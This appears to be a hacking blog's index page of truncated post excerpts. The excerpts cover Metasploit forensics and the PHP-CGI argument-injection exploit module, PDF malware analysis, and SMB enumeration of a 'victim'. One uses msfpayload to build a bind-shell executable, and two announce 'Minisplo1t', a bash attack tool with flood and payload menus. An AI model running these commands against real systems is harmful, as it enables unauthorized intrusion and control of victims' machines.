Art Of Explo1t

Hy guy's.. missing me...? yeah, I think most of you guys looking forward to my post =)) as I promised earlier this year I will be a lot to discuss about forensic. so, go see my writing this time. Equipment: 1. Metasploit Note : make sure you get to this stage meterpreter session The next stage of selecting module " enum_drives ". This module will list the physical drives and logical volumes msf > use post/windows/gather/forensics/enum_drives msf post( enum_drives ) > show options msf post( enum_drives ) > set SESSION 1 msf post( enum_drives ) > run there are multiple logical volumes that look, then I choose the drives " E " for the test module by selecting " recovery_files ". This module list and try to recover deleted files from NTFS file systems msf post( enum_drives ) > use post/windows/gather/forensics/recovery_files msf post( recovery_files ) > show options msf post( recovery_files ) > set SESSION ...

Hello all. Did you still loyal to my posts ? :) on this occasion I will show a few ways for you who likes to do penetration testing . as you know , a penetration testing was not only stopped when a problem to them , but on this occasion I will share some of these issues so that we can overcome. at this stage I would try to exploit the existing decrepitude on the CGI ( Common Gateway Interface ) for PHP ( Personal Home Page ) 5.x.x Description:   When run as a CGI , PHP 5.3.12 and up to version 5.4.2 is vulnerable   to an argument injection vulnerability . This module takes advantage   of the- d flag to set php.ini directives to Achieve code execution . (you can find the complete information when using a module that we use to type in the info ) ok, now i will show you about that :) open your metasploit using command: # msfconsole then type this command for use the module : command: msf > use exploit/multi/http/php_cgi_arg_injection msf exploi...

Introduction : On this occasion I will write some stages of how to analyze a document file extension *.PDF to Determine Whether they were malicious or not. This happened some time ago when I tried to download a study guide book and then the file is detected by anti-virus that I use. this creates great suspicion and then I try to analyze the file, and my guess is true in the document there is a java script which turns a script payload is wrapped into the document. This was some of the steps that I did to analyze. I would do a comparison between a clean PDF document with a document containing a trojan. Equipment : 1. pdfid 2. pdf-parser 3. pdftk.  'apt-get install pdftk' 4. strings in the first stage I will analyze the document " analysis.pdf " that is not interrupted by trojan. OK, now let's go it! test a pdf file # pdfid analysis.pdf the output looks, we just need to pay attention to the line JS / Java Script and turns of the output you ...

Happy new year, Happy new year =)) Like my previous appointment, today I officially released Minisplo1t v.2. Screen Shoot Minisplo1t v.2 Final Release: screen shoot for Main Menu 1 : screen shoot for Main Menu 2 : screen shoot for Main Menu 3 : screen shoot for Main Menu 4 : screen shoot for Main Menu 5 : I design tool using a bash script programming language, it is an open source bro =)) i like open source =)) How to : Download the file by clicking the download button below save in root Directory Extract file : tar -xvf Minisploi-v2-Final.tar Install File configuration ./install.sh starting the Minisploit cd Minisploit-Final/ ./minisplo1t.sh DOWNLOAD best regards Hidemichi-Hiroyuki a.k.a [H2]

before reading this post it helps you read the first post before http://h2-exploitation.blogspot.com/2013/10/exploit-samba-smbclient.html in the post I have discussed how the attacker got access rights to the shared folder that utilize port 445. in the previous post, the attacker can only access a folder, and the attacker is not permitted to see the Users folders, Windows, or other important folders. so, in this post we will see how the attacker gain full access rights like an admin. Equipments 1. Smbclient 2. Metasploit 3. Netcat Connecting using SmbClient: # smbclient //targetIP/Shared\ Folder -U ComputerName -p port [445] there are two files and one folder, but it can not satisfy me. I further undertake manufacturing using Bind TCP payload: # msfpayload windows/shell_bind_tcp LHOST=myIP LPORT=portListening X > Desktop/ Cantik.exe after storing the payload in the Desktop directory, I disconnect from the host victim and then go into the Desktop director...

After a long time did not make a post on the blog, I am finally back with a simple tool of bash programming language. This simple tool i design to simplify the users linux pentest edition (Linux and Backtrack time) to do the testing. I do not know too many programming ​​bash languages. so, I'm sorry if the script is very bad. Category : 1. Analysis     1. Bluetooth Phone Attack     2. FTP ATTACK     3. SSH ATTACK 2. Stress Testin g     1. Crack Route     2. Kill All     3. Flood Mode     4. Blacklist 3. Mini Exploit     1. AutoPwn         1. Addons Firefox 2. Browser Autopwn       2. Generate Payload 1. Meterpreter Reverse Tcp 2. Shell Bind Tcp extract file : # tar -xvf minisploit.tar permission : # chmod +x minisploit.sh Regards Hidemichi-Hiroyuki a.k.a [H2]

Such as FTP (File Transfer Protocol) samba include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on. in this case we have to get the victim to allow shared folders or files. Equipments : 1. SmbClient 2. Nmap 3. Metasploit The firstStep. scanning port the victim's ip-address using Nmap. in here that we need right port is port   445  microsoft-ds. # Nmap (Victim Ip-Address) seen in the picture above. I am lucky :) now, let us look the contents of the port # nmap -p445 --script=smb-os-discovery (Victim Ip-Address) --script=smb-os-discovery : Attempts to determine the operating system, computer name, domain, workgroup, and current time over the SMB protocol (ports 445 or 139) . seen in the picture above, it turns out the victim we use Operating System Windows 7 Ultimate.  Computer Name And NetBIOS Name is a ANONYMOUS-...